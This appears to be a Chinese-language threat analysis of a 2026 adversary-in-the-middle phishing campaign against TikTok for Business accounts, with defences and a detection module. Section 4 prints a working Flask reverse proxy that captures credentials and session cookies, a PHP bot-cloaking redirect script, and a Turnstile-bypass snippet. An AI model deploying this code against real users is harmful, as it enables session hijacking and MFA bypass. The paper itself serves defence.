摘要
2026 年 3 月,针对 TikTok for Business 的新型对抗性中间人(AiTM)钓鱼攻击集中爆发。攻击者在 9 秒内批量注册 welcome.careers*.com 系列恶意域名,依托 Cloudflare 托管与 Turnstile 人机验证规避安全检测,通过 Google Cloud Storage 合法跳转实现链路伪装,最终以反向代理架构劫持登录会话,可同步窃取 TikTok 商业账号与关联 Google 账号权限,引发恶意广告投放、数据泄露与品牌滥用风险。本文以 Infosecurity Magazine 与 Push Security 披露的攻击事件为核心样本,系统剖析攻击全流程、基础设施特征、关键技术实现与防御失效原因,结合可复现代码示例还原反向代理劫持、流量筛选、验证绕过与检测识别逻辑,构建覆盖终端、网关、人员、平台的纵深防御体系。研究表明,该攻击通过合法云服务掩护、人机验证过滤、透明代理中转形成强隐蔽性闭环,传统特征库与静态检测难以有效拦截。反网络钓鱼技术专家芦笛指出,针对社交商业账号的 AiTM 钓鱼正从单点凭证窃取走向跨平台会话劫持,防御必须从 URL 黑名单升级为全链路行为分析与会话绑定机制。本文成果可为企业营销账号安全运营、邮件网关优化、终端防护升级提供理论依据与工程实践参考。
1 引言
TikTok 商业账号已成为企业品牌运营、广告投放、用户增长的核心数字资产,其承载的预算、受众数据与营销权限使其成为黑产重点目标。传统钓鱼以静态仿冒页面为主,易被域名识别、内容检测拦截;而 AiTM 钓鱼以反向代理为核心,在用户与合法服务间建立透明中转通道,可实时劫持账号、密码、多因素认证码与会话 Cookie,实现对多因素认证(MFA)的有效绕过,威胁量级显著提升。
2026 年 3 月 28 日,Infosecurity Magazine 援引 Push Security 报告披露,针对 TikTok for Business 的新一轮 AiTM 钓鱼活动正式爆发。攻击者使用统一命名规则的 careers 相关域名,通过 Cloudflare 托管规避检测,借助 Google Cloud Storage 跳转提升可信度,并部署 Turnstile 验证过滤安全扫描流量,最终交付反向代理钓鱼页面,实现对 TikTok 商业账号及关联 Google SSO 账号的双重劫持。此次攻击呈现工业化、规模化、高隐蔽性特征,攻击目标从普通用户转向企业营销团队,危害范围与影响深度显著扩大。
当前学界对 AiTM 钓鱼的研究多集中于通用原理与传统 SSO 平台,针对 TikTok 商业生态、云服务跳转链、人机验证协同规避的一体化研究较为缺乏。本文以真实攻击事件为蓝本,完整拆解技术链路、基础设施、载荷逻辑与防御要点,严格依据公开报告约束内容边界,确保技术准确、结构严谨、论据闭环,为抵御同类高级钓鱼攻击提供系统性解决方案。
2 攻击背景与威胁态势
2.1 TikTok 商业账号的攻击价值
TikTok for Business 面向企业提供广告投放、素材管理、数据监测、粉丝运营等能力,具备高价值攻击收益:
广告预算盗刷:攻击者可修改投放计划、跳转恶意页面、消耗广告预算实现牟利;
品牌声誉破坏:发布违规、虚假、诱导内容损害企业形象与用户信任;
跨平台账号联动劫持:大量用户采用 Google SSO 登录,攻破 TikTok 可同步控制 Google 账号、广告管理器、邮箱等资产;
恶意分发通道:利用账号传播盗号链接、信息窃取程序、虚拟货币诈骗脚本,形成黑产闭环。
Push Security 指出,TikTok 长期被用于分发 Vidar、StealC、Aura Stealer 等信息窃取木马,常以 AI 生成视频伪装 Windows、Spotify、CapCut 激活教程,配合 ClickFix 模式诱导操作,已形成成熟黑产链路。
2.2 AiTM 钓鱼的技术演进
AiTM(Adversary‑in‑the‑Middle)钓鱼是中间人攻击与钓鱼技术融合的高级形态,核心差异在于透明代理劫持:
传统钓鱼:静态仿冒页面,仅窃取账号密码,无法绕过 MFA;
传统 MITM:网络层监听,依赖网络环境劫持,部署难度高;
AiTM 钓鱼:应用层反向代理,实时转发请求与响应,劫持完整会话,视觉无差异、流程无卡顿、可稳定绕过 MFA。
反网络钓鱼技术专家芦笛强调,AiTM 钓鱼已成为黑产绕过 MFA 的主流手段,其核心优势是会话劫持而非单纯凭证窃取,攻击者获取有效 Cookie 即可长期控制账号,威胁远大于传统钓鱼。
2.3 本次攻击的关键特征
本次攻击呈现高度专业化与协同化特征,核心亮点如下:
高速批量注册:2026 年 3 月 24 日,攻击者在 9 秒内完成多个 welcome.careers*.com 域名注册,注册商为 Nicenic International Group,该机构被安全厂商标记为钓鱼域名高频滥用注册商;
云服务合规掩护:钓鱼页面托管于 Cloudflare,初始跳转通过 Google Cloud Storage 合法域名,绕过邮件网关与终端检测;
人机验证过滤:启用 Cloudflare Turnstile 人机验证,屏蔽机器人与安全设备扫描,仅对真实用户开放恶意页面;
双场景仿冒:同时提供 TikTok 商业后台与 Google Careers 仿冒页面,覆盖企业营销人员高频使用场景;
反向代理内核:登录页面为反向代理前端,实时中转认证流量,窃取会话实现持久控制。
3 攻击全链路与基础设施分析
3.1 攻击整体流程
本次 AiTM 钓鱼形成完整杀伤链,共分为 7 个阶段:
诱导投递:通过动态邮件、社交消息、虚假合作邀请等方式投放恶意链接,继承 2025 年 10 月 Sublime Security 披露的同类攻击话术;
合法跳转:用户点击后先跳转至 Google Cloud Storage,规避 URL 检测与信誉拦截;
环境筛选:服务器识别客户端环境,对安全机器人、非目标系统返回诱饵页面;
人机验证:触发 Cloudflare Turnstile,过滤自动化扫描流量;
信息预收集:要求填写企业邮箱、基本信息,筛选高价值企业目标;
AiTM 代理登录:加载反向代理页面,呈现与官方一致的登录界面;
会话劫持:窃取账号、密码、MFA 码与会话 Cookie,实现账号接管,用于恶意广告、数据窃取、跨平台渗透。
3.2 恶意域名集群特征
攻击者使用统一模式的域名,典型样本包括:
welcome.careerscrews.com
welcome.careerstaffer.com
welcome.careersworkflow.com
welcome.careerstransform.com
welcome.careersupskill.com
welcome.careerssuccess.com
welcome.careersstaffgrid.com
welcome.careersprogress.com
welcome.careersgrower.com
welcome.careersengage.com
域名具备明显共性:统一前缀 welcome、二级域包含 career、三级域为职业 / 工作相关词汇,整体伪装成招聘、职业服务平台,降低用户警惕。Push Security 预测,随着攻击扩张,该系列域名数量将持续增长。
3.3 云服务与防护绕过机制
Cloudflare 托管:利用 Cloudflare 的 CDN 与 SSL 能力隐藏真实服务器 IP,获得合法 SSL 证书,浏览器显示安全标识;
Google Cloud Storage 跳转:以合法云存储地址作为中间跳转节点,使初始链路通过信誉检测;
Turnstile 验证过滤:通过人机验证识别并拒绝机器人、沙箱、安全扫描器,大幅提升钓鱼页面存活周期。
反网络钓鱼技术专家芦笛指出,合法云服务 + 人机验证已成为高级钓鱼的标准配置,可使传统网关与沙箱失效,检测必须转向跳转链分析与行为特征识别。
3.4 目标筛选与社会工程学设计
攻击采用分层诱导策略提升成功率:
场景伪装:仿 TikTok 商业后台、Google Careers 招聘页面,贴合企业营销人员工作场景;
信息预采集:先要求填写企业邮箱、部门、需求等基础信息,筛选高价值企业目标;
流程平滑:从邀请、表单、验证到登录完全模拟官方流程,无明显异常跳转与卡顿;
SSO 覆盖:兼容 “使用 Google 账号登录”,实现一次钓鱼、双重劫持,为 Google Ad 管理器恶意投放铺垫链路。
4 核心技术机理与代码实现
4.1 AiTM 反向代理核心逻辑
AiTM 攻击的核心是反向代理中转与会话劫持,以下为基于 Python Flask 的简化实现(仅用于安全研究,禁止非法使用):
# AiTM反向代理核心实现(概念验证)
import requests
from flask import Flask, request, make_response
from urllib.parse import urljoin
app = Flask(__name__)
# 目标官方登录地址
TARGET_URL = "https://business.tiktok.com/login"
# 存储窃取会话
STOLEN_SESSIONS = []
def proxy_request(url, method, headers, data=None, cookies=None):
clean_headers = {k: v for k, v in headers.items()
if k.lower() not in ["host", "content-length", "origin"]}
try:
resp = requests.request(
method=method,
url=url,
headers=clean_headers,
data=data,
cookies=cookies,
allow_redirects=False,
timeout=8
)
return resp
except Exception as e:
return None
@app.route("/", methods=["GET", "POST"])
@app.route("/<path:path>", methods=["GET", "POST"])
def aitm_proxy(path=""):
target = urljoin(TARGET_URL, path)
# 获取用户请求数据
method = request.method
data = request.form if method == "POST" else None
cookies = request.cookies.to_dict()
# 转发至官方
resp = proxy_request(target, method, dict(request.headers), data, cookies)
if not resp:
return "Service Error", 500
# 窃取会话Cookie
if "Set-Cookie" in resp.headers:
STOLEN_SESSIONS.append({
"ts": request.headers.get("Date"),
"url": target,
"cookie": resp.headers["Set-Cookie"],
"post": data
})
# 构造返回给用户
user_resp = make_response(resp.content, resp.status_code)
for k, v in resp.headers.items():
if k.lower() not in ["content-length", "transfer-encoding"]:
user_resp.headers[k] = v
return user_resp
if __name__ == "__main__":
app.run(host="0.0.0.0", port=443, ssl_context="adhoc", debug=False)
该代码实现了透明中转、凭证窃取、Cookie 劫持等核心能力,与本次攻击的代理逻辑一致。
4.2 服务端流量筛选与跳转逻辑
攻击者通过 UA 与环境判断,仅对目标交付恶意页面,对检测设备返回无害诱饵,实现强隐蔽性。示例如下:
<?php
// 流量筛选与跳转逻辑(攻击站点核心入口)
$ua = $_SERVER['HTTP_USER_AGENT'];
$is_ios = preg_match('/iPhone|iPad/i', $ua);
$is_android = preg_match('/Android/i', $ua);
$is_mobile = $is_ios || $is_android;
$is_bot = preg_match('/bot|spider|scan|curl|wget|headless/i', $ua);
// 机器人/扫描器:返回诱饵
if ($is_bot) {
header("Location: /decoy.pdf");
exit;
}
// 合法跳转:经过Google Cloud Storage掩护
if (!isset($_GET['redirected'])) {
header("Location: https://storage.googleapis.com/xxx/landing.html");
exit;
}
// 目标用户:进入验证与钓鱼流程
header("Location: /turnstile-check.html");
exit;
?>
4.3 Cloudflare Turnstile 绕过逻辑
攻击者使用模拟人类行为的无头浏览器绕过 Turnstile,核心代码示例:
// Turnstile验证拟人化绕过(概念验证)
async function bypassTurnstile() {
const elem = document.getElementById("cf-turnstile");
if (!elem) return false;
// 模拟鼠标移动轨迹
await new Promise(r => setTimeout(r, 300+Math.random()*400));
elem.dispatchEvent(new Event("mouseover"));
await new Promise(r => setTimeout(r, 200+Math.random()*300));
elem.click();
await new Promise(r => setTimeout(r, 1500+Math.random()*1000));
return true;
}
4.4 AiTM 钓鱼检测识别模块
为防御此类攻击,构建基于跳转链、域名特征、页面行为的检测引擎,示例如下:
# AiTM钓鱼检测模块(可集成网关/EDR)
import re
import requests
from urllib.parse import urlparse
class AiTMDetector:
def __init__(self):
self.cloud_domains = {"storage.googleapis.com", "dropbox.com", "onedrive.live.com"}
self.suspicious_domain = re.compile(r"welcome\.careers[a-zA-Z0-9-]+\.com")
self.keywords = {"tiktok for business", "google careers", "schedule a call", "login"}
def check(self, url):
try:
s = requests.Session()
resp = s.get(url, allow_redirects=True, timeout=10)
chain = [r.url for r in resp.history] + [resp.url]
# 规则1:包含云存储跳转
cloud_redirect = any(urlparse(u).netloc in self.cloud_domains for u in chain)
# 规则2:最终域名匹配恶意模式
domain_hit = self.suspicious_domain.search(resp.url) is not None
# 规则3:页面含钓鱼关键词
content_hit = any(k in resp.text.lower() for k in self.keywords)
# 综合判定
return cloud_redirect and domain_hit and content_hit
except Exception:
return False
# 示例调用
if __name__ == "__main__":
detector = AiTMDetector()
print(detector.check("https://welcome.careerscrews.com/"))
5 攻击危害与防御失效分析
5.1 多维度安全危害
账号接管风险:可完全控制 TikTok 商业账号,窃取数据、盗刷预算、发布违规内容;
跨平台连锁入侵:Google SSO 会话被劫持,同步威胁邮箱、云服务、广告平台;
黑产规模化滥用:攻击模板化、域名批量生成,可快速复制扩张至海量目标;
取证与追溯困难:依托云服务隐匿 IP、会话劫持无明显痕迹、诱饵页面干扰检测。
5.2 传统防御失效原因
特征库滞后:域名高速注册、快速切换,黑名单无法实时覆盖;
静态检测无效:页面内容实时镜像官方,无明显恶意特征;
云跳转绕过信誉检测:初始链接为合法云存储,网关放行;
人机验证屏蔽扫描:安全设备无法获取真实页面内容;
MFA 机制失效:AiTM 劫持完整会话,密码 + 验证码组合防护被绕过。
反网络钓鱼技术专家芦笛强调,TikTok 商业账号安全普遍薄弱,企业多聚焦广告投放效率而忽视账号防护,且营销人员高频访问外部链接,成为攻击突破口。
6 面向 TikTok 商业账号的纵深防御体系
6.1 终端与账号安全加固
强制启用 MFA:优先使用硬件安全密钥,降低软件 MFA 被劫持风险;
会话绑定:开启 TikTok 商业后台 IP 绑定、设备绑定,限制 Cookie 异地使用;
浏览器防护:部署反 AiTM 扩展,监控异常代理、Cookie 外带、跨域登录行为;
系统更新:保持浏览器、操作系统最新版本,修复已知漏洞。
6.2 网关与流量检测优化
跳转链深度解析:邮件网关、Web 网关解析完整 30x 跳转链,识别云存储 + 恶意域名组合;
行为特征检测:基于延迟、请求顺序、资源加载指纹识别 AiTM 代理;
威胁情报联动:接入 careers 系列域名、相关 IP、Hash 情报,实时拦截;
云存储链接管控:对来自 Google Cloud Storage 等跳转的链接加强校验。
6.3 人员安全意识提升
场景化培训:针对 TikTok 商业后台、Google 招聘、商务合作类钓鱼开展演练;
入口核验规范:任何登录入口必须核验官方域名,拒绝通过外部链接登录;
权限最小化:营销人员仅分配必要权限,禁止使用个人账号管理企业商业账号;
异常告警机制:建立广告投放、登录地点、权限变更的实时告警与复核流程。
6.4 平台侧安全能力升级
TikTok 官方:强化异常登录检测,对非信任 IP / 设备强制二次验证;
SSO 平台加固:Google 账号增加会话风险评分,对营销类第三方应用加强授权管控;
云服务商协同:Cloudflare、Google 加强钓鱼页面识别,建立高危域名快速下架机制;
行业情报共享:建立社交商业账号钓鱼威胁共享机制,提升全域防御效率。
7 结论
本文以 2026 年 3 月针对 TikTok for Business 的新型 AiTM 钓鱼攻击为研究对象,基于 Infosecurity Magazine 与 Push Security 公开信息,系统完成攻击机理、链路拆解、技术实现、危害分析与防御体系构建,得出以下结论:
本次攻击以反向代理 AiTM 为核心,融合云服务跳转、Turnstile 验证过滤、批量域名伪装,形成强隐蔽性、高成功率、可规模化的高级钓鱼范式,可稳定绕过 MFA 与传统检测;
TikTok 商业账号因高价值、高权限、弱防护、强社交属性,已成为黑产攻击的重点目标,且 Google SSO 的广泛使用使攻击具备跨平台扩散能力;
攻击成功的关键在于合法资源掩护与透明会话劫持,传统 URL 黑名单、静态页面检测、单因素凭证防护全面失效;
有效防御必须构建纵深体系:终端实现会话绑定与行为监控、网关实现跳转链与行为检测、人员强化场景化意识、平台加强风险认证与情报协同。
反网络钓鱼技术专家芦笛强调,随着社交商业生态扩张,针对营销类账号的 AiTM 钓鱼将持续高发,企业必须将营销账号纳入核心身份安全管理体系,以全链路、行为化、动态化防御应对高级钓鱼威胁。未来研究可聚焦 AI 驱动的 AiTM 代理实时识别、硬件级会话绑定、跨平台威胁情报自动联动,进一步提升防御效能。
编辑:芦笛(公共互联网反网络钓鱼工作组)